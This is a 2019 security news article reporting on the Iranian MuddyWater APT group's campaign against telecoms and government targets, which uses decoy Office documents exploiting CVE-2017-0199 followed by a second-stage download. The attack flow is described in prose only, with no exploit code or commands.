Show vulnerabilities with patch / with exploit
7 June 2019

The MuddyWater APT group adds new attack vectors to its arsenal


The MuddyWater APT group adds new attack vectors to its arsenal

Despite the recent exposure of some of its tools and strategies the Iranian MuddyWater cyber-espionage group continued to evolve its attack methods by supplementing its arsenal with two new exploits. Specifically, the group has been leveraging malicious documents and files to target telecommunications organizations and impersonate government entities in Iraq, Pakistan, and Tajikistan, revealed a report from Israeli company ClearSky Cyber Security.

The threat actor has been carrying out attacks in two stages against the targets. The first stage involves lure documents designed to exploit a well known RCE-vulnerability CVE-2017-0199 in Microsoft Office, while the second stage lets the attackers communicate with compromised servers to download an infected file.

The researchers said that this is the first time MuddyWater used these two vectors in conjunction. They have also added that the malicious documents have been detected only by three anti-virus solutions. “This is in stark comparison to a previous attack we reported on, in which the documents were identified 32 times,” noted ClearSky.

Once the victim's machine is compromised the malware tries to communicate with attackers' C2 servers and, if the attempt fails, the victim is redirected to Wikipedia.

To exploit the CVE-2017-0199 flaw, MuddyWatter uses two types of decoy documents, with the first one making use of error messages while the second type of documents exploit the vulnerability right after they are opened by the victims.

MuddyWater (aka Temp.Zagros, G0069 and SeedWorm) is a high-profile Advanced Persistent Threat (APT) actor, which is believed to have ties to Iran. MuddyWater was first observed in 2017 and while it is relatively new to the cyber espionage scene in the last nine months the group has been highly active managing to compromise 131 victims in 30 organizations all over the world, from Russia to Saudi Arabia to North America.

Back to the list

Latest Posts

Updated ComRAT malware uses Gmail web UI to receive commands and exfiltrate data

Updated ComRAT malware uses Gmail web UI to receive commands and exfiltrate data

The ComRAT v4 malware includes two new features, such as the ability to exfiltrate antivirus logs and the ability to control the malware using a Gmail inbox.
26 May 2020
25 million Mathway user records leak online

25 million Mathway user records leak online

Since the start of this month, ShinyHunters has been offering access to databases containing millions user records obtained from hacks of various companies.
26 May 2020
Hackers put up for sale SQL databases stolen from online shops

Hackers put up for sale SQL databases stolen from online shops

More than half of hacked databases are from online shops in Germany, others are from Brazil, the U.S., Italy, India, Spain, and Belarus.
26 May 2020
Featured vulnerabilities
Stored cross-site scripting in Composr CMS
Low Not Patched | 26 May, 2020
Denial of service in GoldWave
Medium Not Patched | 26 May, 2020
OS Command Injection in Online Discussion Forum Site
Medium Not Patched | 26 May, 2020